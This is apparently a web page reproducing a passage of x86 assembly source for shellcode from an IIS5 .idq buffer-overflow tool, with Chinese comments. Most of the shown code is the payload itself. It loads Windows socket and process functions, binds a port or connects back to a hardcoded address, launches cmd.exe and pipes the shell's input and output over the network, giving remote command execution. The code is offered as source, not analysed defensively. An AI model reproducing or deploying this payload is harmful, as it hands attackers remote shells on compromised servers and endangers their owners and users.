📄 snake的iis5_idq命令行溢出程序源代码.htm
字号:
call eax;
test eax, eax;
jz _Quit_While_Read_Data_Loop; //WriteFile(..) == 0, 失败,管套中断.
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_3;
run_actual6_1:
jmp run_actual6;
_temp_3:
_Read_StdoutPipe:
;//PeekNamedPipe(hReadPipe,NULL,0,NULL,&dwTemp,NULL );
xor eax, eax;
push eax; //NULL
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push edx; //&dwTemp
push eax; //NULL
push eax; //0
push eax; //NULL
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax; //hReadPipe
mov eax, [esi+SkOverflowFuncAddr.PeekNamedPipe];
call eax;
mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
test eax, eax;
jz _No_Data_To_Read_Yet;
;//ReadFile( hReadPipe, szTemp, sizeof(szTemp), &dwTemp, NULL)
xor eax, eax;
push eax; //NULL
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push edx; //&dwTemp
mov al, SIZE_OF_TEMP_BUFFER;
push eax; //sizeof(szTemp);
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push edx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax; //hReadPipe
mov eax, [esi+SkOverflowFuncAddr.ReadFile];
call eax; //ReadFile.
;//if( ReadFile (...) == 0)? then quit.
test eax, eax;
je _Quit_While_Read_Data_Loop;
;//send( newsocket, szTemp, dwTemp, 0);
xor eax, eax;
push eax; //0
mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push eax; //dwTemp;
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push edx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.msocket];
push eax; //socket.
mov eax, [esi+SkOverflowFuncAddr.send];
call eax;
cmp eax, -1;
je _Quit_While_Read_Data_Loop;
jmp _Read_StdoutPipe; //continue to read next data.
_No_Data_To_Read_Yet:
jmp _While_Read_Data_Loop;
_Quit_While_Read_Data_Loop:
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual6:
jmp run_actual;
;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Create_Two_Pipe:
push ebp;
mov ebp, esp;
xor eax, eax;
mov al, 0f0h;
sub esp, eax; //开辟空间
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1;
mov edi, FUNC_PARAM_2;
xor ebx,ebx;
lea edi, [ebp-10h];
;//SecurityAttributes.lpSecurityDescriptor = NULL; //default ACL
lea edx, [edi+SECURITY_ATTRIBUTES.lpSecurityDescriptor];
mov [edx], ebx;
;//SecurityAttributes.bInheritHandle = TRUE; //will inherit handle
lea edx, [edi+SECURITY_ATTRIBUTES.bInheritHandle];
inc ebx;
mov [edx], ebx;
;//SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
lea edx, [edi+SECURITY_ATTRIBUTES.nLength];
mov bl, size SECURITY_ATTRIBUTES;
mov [edx], ebx;
xor ebx, ebx;
;//bResult = CreatePipe( &hReadPipe, &ShellStdoutPipe, &SecurityAttributes, 0);output into _FUNC_PARAM_2's variables.
push edi; //save.
push ebx; //0
push edi; //&SecurityAttributes
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
mov [edx], ebx; //ShellStdoutPipe = 0;
push edx; //&ShellStdoutPipe
lea edx, [edi+Shell_Cmd_Pipe.hReadPipe];
push edx;; //&hReadPipe
mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
call eax;
pop edi; //restore.
test eax, eax;
je _Create_Pipe_Quit_Error;
;//Create Second Pipe.
;//CreatePipe( &ShellStdinPipe, &hWritePipe, &SecurityAttributes, 0);
xor ebx, ebx;
push ebx; //0
push edi; //&SecurityAttributes
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.hWritePipe];
push edx; //&hWritePipe
lea edx, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
mov [edx],ebx;
push edx; //&ShellStdinPipe
mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
call eax;
test eax, eax;
je _Create_Pipe_Quit_Error;
xor eax, eax;
inc eax;
jmp _Create_Pipe_Quit;
_Create_Pipe_Quit_Error:
xor eax, eax;
jmp _Create_Pipe_Quit;
nop;
_Create_Pipe_Quit:
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual:
lea esi, [esp];
mov esi, [esi]; //ebx 是调用代码的地址
xor ecx, ecx;
mov cx,MyDataOffset;
add esi, ecx; //esx 是未来 数据的地址.
;//ebp-0x2ff 处,是 szShellNeedFunc结构.
lea edi, [ebp - szShellNeedFunc_OFFSET];
push edi;
;//MyDebugAdd -----
mov cx, _size_AllData;
rep movsb;
;//还要包括 连接信息结构 的数据
pop edi;
push edi;
;//将'+'转换成 "\x00"
;//void _Convert_Add_Sign_To_Null_Sign(void *ptr, int iLen, DWORD dwOld, DWORD dwNew);
xor ecx, ecx;
push ecx; //---参数4
mov cl, '+';
push ecx; //---参数3
mov cx, _size_szShellNeedFunc;
push ecx; //---参数2
xor ebx, ebx;
mov bl, String_Of_Data_Offset;
add edi, ebx; //edi指向 真正的 szShellNeedFunc
push edi; //---参数1
call _Convert_Add_Sign_To_Null_Sign;
add esp, 10h;
;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址
;//void _Get_Overflow_Addr_From_Shell_Func( SkOverflowFuncAddr *pSkOverflowFuncAddr, char *ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr)
xor ecx, ecx;
mov cx, _GetModuleHandle_Addr_Offset;
mov esi, edi;
add esi, ecx;
mov eax, [esi+4]
push eax; ;//GetProcAddress_Addr
mov eax, [esi];
push eax; ;//GetModuleHandle_Addr
push edi;
;//ebp-0x1ff处,是 SkOverflowFuncAddr结构.
lea esi, [ebp-SkOverflowFuncAddr_OFFSET];
push esi;
call _Get_Overflow_Addr_From_Shell_Func;
add esp, 10h;
pop edi;
;//创建 一个管套,监听一个端口/连接到一个ip:port,返回该管套.
;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
push edi;
push esi;
call _Create_Bind_Connect_Socket_To_Port;
add esp, 8;
test eax, eax;
jz Main_Quit_Now; //socket 失败.
lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
lea ebx, [edi + Shell_Cmd_Pipe.msocket];
mov [ebx], eax; //保存结果到 msocket中.
;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
;//创建2个pipe,用来绑定shell.
push edi;
push esi;
call _Create_Two_Pipe;
add esp, 8;
test eax, eax;
jz Main_Quit_Now;
;//now is ok.
;//在管套 pipe 上,运行进程 pStrCmd;
;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
lea edi, [ebp-szShellNeedFunc_OFFSET];
xor eax,eax;
mov al, String_Of_Data_Offset; //cmd.exe命令行在数据中的偏移.
add edi, eax;
push edi; //"cmd.exe"的指针
lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
push edi;
push esi;
call _Create_Process_To_Handle;
add esp, 0ch;
;//接受管套的数据,写进pipe,读pipe,发送到socket.
;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
push edi;
push esi;
call _Recv_Write_Socket_Pipe;
add esp, 8;
;//关闭不再用的管套
;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
push edi;
push esi;
call _Close_All_Communication_Pipe
add esp, 8;
;//关闭该进程
xor eax, eax;
push eax;
lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
mov eax, [edx+PROCESS_INFORMATION.hProcess];
push eax;
mov eax, [esi+SkOverflowFuncAddr.TerminateProcess];
call eax;
Main_Quit_Now: ;//现在推出..
;//exit now.
xor eax, eax;
push eax;
mov eax, [esi+ SkOverflowFuncAddr.ExitProcess];
call eax;
ret;
;//quit_return:
;//恢复堆栈
mov esp,ebp;
pop ebp;
nop;
nop;
;//下面是数据:
MyDataOffset equ $-call_back_Data_Offset; //call 函数,到这里的距离.
ConnectTypeOffset equ $-start;
ListenPortOffset equ ConnectTypeOffset+stConnectInfo.dwListenPort;
ConnectIP1Offset equ ConnectTypeOffset+stConnectInfo.dwIP1;
ConnectIP2Offset equ ConnectTypeOffset+stConnectInfo.dwIP2;
ConnectPortOffset equ ConnectTypeOffset+stConnectInfo.dwConnectPort;
MyConnectInfo stConnectInfo < 2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h>
String_Of_Data_Offset equ $-MyConnectInfo;
ExecCommandOffset equ $-start;
szShellNeedFunc db 'cmd.exe+++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
;//下面是函数信息.
SHELL_NEED_FUNC_BODY_OFFSET equ $-szShellNeedFunc;//这个是shell函数和dll的偏移
db 02h
db 0eh, 'kernel32.dll+', '+'
db 0eh
db 11h, 'TerminateProcess', '+'
db 0bh, 'CreatePipe', '+'
db 10h, 'GetStartupInfoA', '+'
db 0fh, 'CreateProcessA', '+'
db 0eh, 'PeekNamedPipe', '+'
db 0ch, 'GlobalAlloc', '+'
db 0bh, 'WriteFile', '++'
db 09h, 'ReadFile', '+'
db 06h, 'Sleep', '+'
db 0ch, 'ExitProcess', '+'
db 0eh, 'GetLastError+', '+'
db 10h, 'DuplicateHandle', '+'
db 12h, 'GetCurrentProcess', '+'
db 0ch, 'CloseHandle','+'
db 0bh, 'ws2_32.dll', '+'
db 0bh
db 07h, 'socket', '+'
db 05h, 'bind', '+'
db 07h, 'listen', '+'
db 07h, 'accept', '+'
db 05h, 'send', '+'
db 05h, 'recv', '+'
db 0bh, 'setsockopt', '+'
db 0bh, 'WSAStartup', '+'
db 0ch, 'closesocket', '+'
db 08h, 'connect', '+'
db 0ch, 'gethostname', '+'
db '+++++++++++++++++++++'
_GetModuleHandle_Addr_Offset equ $-szShellNeedFunc
GetModuleHandleOffset equ $-start;
GetModuleHandleA_Addr dd 77e756dbh
GetProcAddressOffset equ $-start;
GetProcAddressA_Addr dd 77e7564bh
_size_szShellNeedFunc equ $-szShellNeedFunc+1
_size_AllData equ $-MyConnectInfo+1
_sk_Bind_ConnectShellCode endp
db '---------------------------------------------------------'
;//重要数据在代码中的偏移
stDataSetOffset struct
dwConnectType DD 0;
dwListenPort DD 0;
dwConnectIP1 DD 0;
dwConnectIP2 DD 0;
dwConnectPort DD 0;
dwExecCommand DD 0;
wSizeExecCommand DW 0;
wReserv1 DW 0
dwGetModuleHandle DD 0;
dwGetProcAddress DD 0;
stDataSetOffset ends
_GetDataSetOffset_Value proc
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1;
lea edi, [esi+stDataSetOffset.dwConnectType];
mov eax, ConnectTypeOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwListenPort];
mov eax, ListenPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP1];
mov eax, ConnectIP1Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP2];
mov eax, ConnectIP2Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectPort];
mov eax, ConnectPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwExecCommand];
mov eax, ExecCommandOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.wSizeExecCommand];
mov ax, SHELL_NEED_FUNC_BODY_OFFSET;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwGetModuleHandle];
mov eax, GetModuleHandleOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwGetProcAddress];
mov eax, GetProcAddressOffset;
mov [edi], eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
_GetDataSetOffset_Value endp
end
</PRE>
</BODY></HTML>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -